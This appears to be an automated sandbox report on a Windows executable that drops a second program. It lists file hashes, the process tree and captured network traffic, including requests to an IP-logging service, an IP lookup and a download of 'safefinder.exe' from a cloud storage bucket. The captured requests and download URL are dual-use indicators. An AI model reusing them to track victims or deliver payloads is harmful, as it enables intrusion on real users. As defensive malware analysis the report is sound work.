f1bbcc5c678d174d858ae089f4494e3ea8bcfc418098d61804a15e437f08aff7

Resubmissions

03/07/2024, 22:59 UTC

240703-2yn7wszhlp 10

03/07/2024, 16:13 UTC

240703-tn93lsyglf 10

03/07/2024, 16:11 UTC

240703-tm84xsyfma 10

10/05/2024, 16:25 UTC

240510-tw1h5shh47 10

24/08/2023, 11:16 UTC

230824-nda8msdf8z 10

Analysis

max time kernel
141s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03/07/2024, 16:11 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Archive.zip__ccacaxs2tbz2t6ob3e.exe
Size

430KB
MD5

a3cab1a43ff58b41f61f8ea32319386b
SHA1

94689e1a9e1503f1082b23e6d5984d4587f3b9ec
SHA256

005d3b2b78fa134092a43e53112e5c8518f14cf66e57e6a3cc723219120baba6
SHA512

8f084a866c608833c3bf95b528927d9c05e8d4afcd8a52c3434d45c8ba8220c25d2f09e00aade708bbbc83b4edea60baf826750c529e8e9e05b1242c56d0198d
SSDEEP

6144:vU9Q9tD5WuDQa4t3BMgLkzvCOnYxcEaSAOPou8BWinO8DR:8Q9tD5WyQlBBVAnYxRhr8DR

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3652	7C73.tmp.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	iplogger.org
15	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 4756 wrote to memory of 3652	4756	Archive.zip__ccacaxs2tbz2t6ob3e.exe	80
PID 4756 wrote to memory of 3652	4756	Archive.zip__ccacaxs2tbz2t6ob3e.exe	80
PID 4756 wrote to memory of 3652	4756	Archive.zip__ccacaxs2tbz2t6ob3e.exe	80

C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe
"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4756
- C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe
  2⤵
  - Executes dropped EXE
  PID:3652

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

domainht6.ml

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

domainht6.ml

IN A

Response
DNS

iplogger.org

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

104.21.4.208

iplogger.org

IN A

172.67.132.113
GET

http://iplogger.org/1Wnwe7

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

104.21.4.208:80

Request

GET /1Wnwe7 HTTP/1.1
Content-Type: text/html
Khsopeyrkdmva: hoemckleka
User-Agent: krldn
Host: iplogger.org
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Wed, 03 Jul 2024 16:14:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://iplogger.org/1Wnwe7#80
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4Cr3TxxzIR1OnaxVjQQUyyIxZb3DDaMt7fu3S5FxgCnfLxfVHSs3209iG3XZvHY5TcRJtEGbJ%2F6onYCkbnTmgFDSj3ap%2BDXnejJmL5HJVg8mb1xs2W8a9mU0R8D1iI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89d82acb8884776e-LHR
alt-svc: h3=":443"; ma=86400
GET

https://iplogger.org/1Wnwe7

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

104.21.4.208:443

Request

GET /1Wnwe7 HTTP/1.1
Khsopeyrkdmva: hoemckleka
User-Agent: krldn
Cache-Control: no-cache
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 03 Jul 2024 16:14:12 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: 170542143211120935=1; expires=Thu, 03 Jul 2025 16:14:12 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=191.101.209.39; expires=Thu, 03 Jul 2025 16:14:12 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.41156768798828125
expires: Wed, 03 Jul 2024 16:14:12 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZLBK4bZg0dIIQqFhhxzrZsoq0QePRCor3IMUWKiEczwD%2BNzW7jBuKNugpPbrUV4ssvmzaUkd6pbFzSxY1sLazalFQ0%2FKGiuG7tz1f%2B5ioyZ3NuRqiBuTN5WAm3zua4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89d82aceae39d16c-LHR
alt-svc: h3=":443"; ma=86400
DNS

x2.c.lencr.org

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

x2.c.lencr.org

IN A

Response

x2.c.lencr.org

IN CNAME

crl.root-x1.letsencrypt.org.edgekey.net

crl.root-x1.letsencrypt.org.edgekey.net

IN CNAME

e8652.dscx.akamaiedge.net

e8652.dscx.akamaiedge.net

IN A

23.55.97.11
GET

http://x2.c.lencr.org/

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

23.55.97.11:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.c.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/pkix-crl
Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
ETag: "65ca969f-12b"
Cache-Control: max-age=3600
Expires: Wed, 03 Jul 2024 17:14:12 GMT
Date: Wed, 03 Jul 2024 16:14:12 GMT
Content-Length: 299
Connection: keep-alive
DNS

ip-api.com

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/xml

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

208.95.112.1:80

Request

GET /xml HTTP/1.1
Content-Type: text/html
Khsopeyrkdmva: hoemckleka
User-Agent: krldn
Host: ip-api.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 03 Jul 2024 16:14:11 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 457
Access-Control-Allow-Origin: *
X-Ttl: 47
X-Rl: 43
DNS

google-analytics.com

7C73.tmp.exe

Remote address:

8.8.8.8:53

Request

google-analytics.com

IN A

Response

google-analytics.com

IN A

172.217.169.4
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

11.97.55.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.97.55.23.in-addr.arpa

IN PTR

Response

11.97.55.23.in-addr.arpa

IN PTR

a23-55-97-11deploystaticakamaitechnologiescom
DNS

208.4.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.4.21.104.in-addr.arpa

IN PTR

Response
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
POST

http://google-analytics.com/collect

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

172.217.169.4:80

Request

POST /collect HTTP/1.1
Content-Type: text/html
Gkjfdshfkjjd: dsdjdsjdhv
User-Agent: jdlnb
Host: google-analytics.com
Content-Length: 98
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Date: Wed, 03 Jul 2024 16:14:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 35
POST

http://google-analytics.com/collect

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

172.217.169.4:80

Request

POST /collect HTTP/1.1
Content-Type: text/html
Gkjfdshfkjjd: dsdjdsjdhv
User-Agent: jdlnb
Host: google-analytics.com
Content-Length: 91
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Date: Wed, 03 Jul 2024 16:14:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 35
DNS

osdsoft.com

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

osdsoft.com

IN A

Response

osdsoft.com

IN A

103.224.182.253
GET

http://osdsoft.com/20190118/things.xml

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

103.224.182.253:80

Request

GET /20190118/things.xml HTTP/1.1
Content-Type: text/html
Khsopeyrkdmva: hoemckleka
User-Agent: krldn
Host: osdsoft.com
Cache-Control: no-cache

Response

HTTP/1.1 302 Found

date: Wed, 03 Jul 2024 16:14:12 GMT
server: Apache
set-cookie: __tad=1720023252.4485212; expires=Sat, 01-Jul-2034 16:14:12 GMT; Max-Age=315360000
location: http://ww38.osdsoft.com/20190118/things.xml
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
DNS

ww38.osdsoft.com

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

ww38.osdsoft.com

IN A

Response

ww38.osdsoft.com

IN CNAME

756471.parkingcrew.net

756471.parkingcrew.net

IN A

76.223.26.96

756471.parkingcrew.net

IN A

13.248.148.254
GET

http://ww38.osdsoft.com/20190118/things.xml

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

76.223.26.96:80

Request

GET /20190118/things.xml HTTP/1.1
Khsopeyrkdmva: hoemckleka
User-Agent: krldn
Cache-Control: no-cache
Host: ww38.osdsoft.com
Connection: Keep-Alive
Cookie: __tad=1720023252.4485212

Response

HTTP/1.1 200 OK

Date: Wed, 03 Jul 2024 16:14:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket011
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_g/5eci+3ZqFjyQa9R7jEoAkh3eKd9EG8CZPmuyoh+GAffdjf8d6BEnidEATz5OVLEloYY65lROuFnrAcTO3ZqQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Domain: osdsoft.com
X-Subdomain: ww38
DNS

4.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.169.217.172.in-addr.arpa

IN PTR

Response

4.169.217.172.in-addr.arpa

IN PTR

lhr25s26-in-f41e100net
DNS

linkury.s3-us-west-2.amazonaws.com

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

linkury.s3-us-west-2.amazonaws.com

IN A

Response

linkury.s3-us-west-2.amazonaws.com

IN CNAME

s3-r-w.us-west-2.amazonaws.com

s3-r-w.us-west-2.amazonaws.com

IN A

52.92.180.146

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.78.13

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.82.178

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.78.4

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.85.10

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.85.80

s3-r-w.us-west-2.amazonaws.com

IN A

3.5.82.217

s3-r-w.us-west-2.amazonaws.com

IN A

52.92.192.162
GET

https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

52.92.180.146:443

Request

GET /safefinder.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: linkury.s3-us-west-2.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: gn9cn4fqQKdN5qT2V1m8roNLLO4u+2keYebSSx7L2dAa553A/Go9b5vXmEqKFCErQmkD0GLWejs=
x-amz-request-id: 9QAA0Q707K4XQTHT
Date: Wed, 03 Jul 2024 16:14:15 GMT
Last-Modified: Mon, 13 Apr 2020 13:31:09 GMT
ETag: "060404f288040959694844afbd102966"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 152576
DNS

ocsp.r2m01.amazontrust.com

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

8.8.8.8:53

Request

ocsp.r2m01.amazontrust.com

IN A

Response

ocsp.r2m01.amazontrust.com

IN A

143.204.67.183
GET

http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D

Archive.zip__ccacaxs2tbz2t6ob3e.exe

Remote address:

143.204.67.183:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m01.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Wed, 03 Jul 2024 14:44:48 GMT
Last-Modified: Wed, 03 Jul 2024 14:44:48 GMT
Server: ECAcc (lhd/35E6)
X-Cache: Hit from cloudfront
Via: 1.1 aa5f00ed95fd16b8d894989f7ad491ba.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR61-P1
X-Amz-Cf-Id: N5aD9V2TrUyGkk8XEZjP4DZLzL9DDcKxqrgaRlh9V3ENulIqP7BT_A==
Age: 5366
DNS

253.182.224.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.182.224.103.in-addr.arpa

IN PTR

Response

253.182.224.103.in-addr.arpa

IN PTR

lb-182-253abovecom
DNS

96.26.223.76.in-addr.arpa

Remote address:

8.8.8.8:53

Request

96.26.223.76.in-addr.arpa

IN PTR

Response

96.26.223.76.in-addr.arpa

IN PTR

aba1c1ff9d2ec5376awsglobalacceleratorcom
DNS

190.178.204.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.178.204.143.in-addr.arpa

IN PTR

Response

190.178.204.143.in-addr.arpa

IN PTR

server-143-204-178-190lhr50r cloudfrontnet
DNS

146.180.92.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.180.92.52.in-addr.arpa

IN PTR

Response

146.180.92.52.in-addr.arpa

IN PTR

s3-us-west-2-r-w amazonawscom
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR

Response

113.216.138.108.in-addr.arpa

IN PTR

server-108-138-216-113lhr61r cloudfrontnet
DNS

183.67.204.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.67.204.143.in-addr.arpa

IN PTR

Response

183.67.204.143.in-addr.arpa

IN PTR

server-143-204-67-183lhr61r cloudfrontnet
POST

http://google-analytics.com/collect

7C73.tmp.exe

Remote address:

172.217.169.4:80

Request

POST /collect HTTP/1.1
Content-Type: text/html
Gkjfdshfkjjd: dsdjdsjdhv
User-Agent: jdlnb
Host: google-analytics.com
Content-Length: 96
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Date: Wed, 03 Jul 2024 16:14:15 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 35
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

203.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.107.17.2.in-addr.arpa

IN PTR

Response

203.107.17.2.in-addr.arpa

IN PTR

a2-17-107-203deploystaticakamaitechnologiescom
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

198.111.78.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.111.78.13.in-addr.arpa

IN PTR

Response

104.21.4.208:80

http://iplogger.org/1Wnwe7

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

462 B
1.0kB
7
5

HTTP Request

GET http://iplogger.org/1Wnwe7

HTTP Response

301
104.21.4.208:443

https://iplogger.org/1Wnwe7

tls, http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

1.1kB
6.6kB
14
10

HTTP Request

GET https://iplogger.org/1Wnwe7

HTTP Response

200
23.55.97.11:80

http://x2.c.lencr.org/

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

391 B
760 B
6
4

HTTP Request

GET http://x2.c.lencr.org/

HTTP Response

200
208.95.112.1:80

http://ip-api.com/xml

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

319 B
765 B
4
3

HTTP Request

GET http://ip-api.com/xml

HTTP Response

200
172.217.169.4:80

http://google-analytics.com/collect

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

889 B
1.1kB
8
6

HTTP Request

POST http://google-analytics.com/collect

HTTP Response

200

HTTP Request

POST http://google-analytics.com/collect

HTTP Response

200
103.224.182.253:80

http://osdsoft.com/20190118/things.xml

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

428 B
478 B
6
4

HTTP Request

GET http://osdsoft.com/20190118/things.xml

HTTP Response

302
76.223.26.96:80

http://ww38.osdsoft.com/20190118/things.xml

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

840 B
8.7kB
14
13

HTTP Request

GET http://ww38.osdsoft.com/20190118/things.xml

HTTP Response

200
52.92.180.146:443

https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe

tls, http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

6.8kB
164.8kB
134
130

HTTP Request

GET https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe

HTTP Response

200
143.204.67.183:80

http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D

http

Archive.zip__ccacaxs2tbz2t6ob3e.exe

521 B
1.2kB
6
5

HTTP Request

GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D

HTTP Response

200
172.217.169.4:80

http://google-analytics.com/collect

http

7C73.tmp.exe

541 B
589 B
6
4

HTTP Request

POST http://google-analytics.com/collect

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

domainht6.ml

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

58 B
116 B
1
1

DNS Request

domainht6.ml
8.8.8.8:53

iplogger.org

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

58 B
90 B
1
1

DNS Request

iplogger.org

DNS Response

104.21.4.208

172.67.132.113
8.8.8.8:53

x2.c.lencr.org

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

60 B
165 B
1
1

DNS Request

x2.c.lencr.org

DNS Response

23.55.97.11
8.8.8.8:53

ip-api.com

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

google-analytics.com

dns

7C73.tmp.exe

66 B
82 B
1
1

DNS Request

google-analytics.com

DNS Response

172.217.169.4
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

11.97.55.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

11.97.55.23.in-addr.arpa
8.8.8.8:53

208.4.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

208.4.21.104.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

osdsoft.com

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

57 B
73 B
1
1

DNS Request

osdsoft.com

DNS Response

103.224.182.253
8.8.8.8:53

ww38.osdsoft.com

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

62 B
130 B
1
1

DNS Request

ww38.osdsoft.com

DNS Response

76.223.26.96

13.248.148.254
8.8.8.8:53

4.169.217.172.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

4.169.217.172.in-addr.arpa
8.8.8.8:53

linkury.s3-us-west-2.amazonaws.com

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

80 B
239 B
1
1

DNS Request

linkury.s3-us-west-2.amazonaws.com

DNS Response

52.92.180.146

3.5.78.13

3.5.82.178

3.5.78.4

3.5.85.10

3.5.85.80

3.5.82.217

52.92.192.162
8.8.8.8:53

ocsp.r2m01.amazontrust.com

dns

Archive.zip__ccacaxs2tbz2t6ob3e.exe

72 B
88 B
1
1

DNS Request

ocsp.r2m01.amazontrust.com

DNS Response

143.204.67.183
8.8.8.8:53

253.182.224.103.in-addr.arpa

dns

74 B
108 B
1
1

DNS Request

253.182.224.103.in-addr.arpa
8.8.8.8:53

96.26.223.76.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

96.26.223.76.in-addr.arpa
8.8.8.8:53

190.178.204.143.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

190.178.204.143.in-addr.arpa
8.8.8.8:53

146.180.92.52.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

146.180.92.52.in-addr.arpa
8.8.8.8:53

113.216.138.108.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

113.216.138.108.in-addr.arpa
8.8.8.8:53

183.67.204.143.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

183.67.204.143.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

203.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

203.107.17.2.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

198.111.78.13.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

198.111.78.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe

Filesize
149KB

MD5
060404f288040959694844afbd102966

SHA1
e0525e9ef6713fd7f269a669335ce3ddaab4b6a1

SHA256
40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a

SHA512
ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.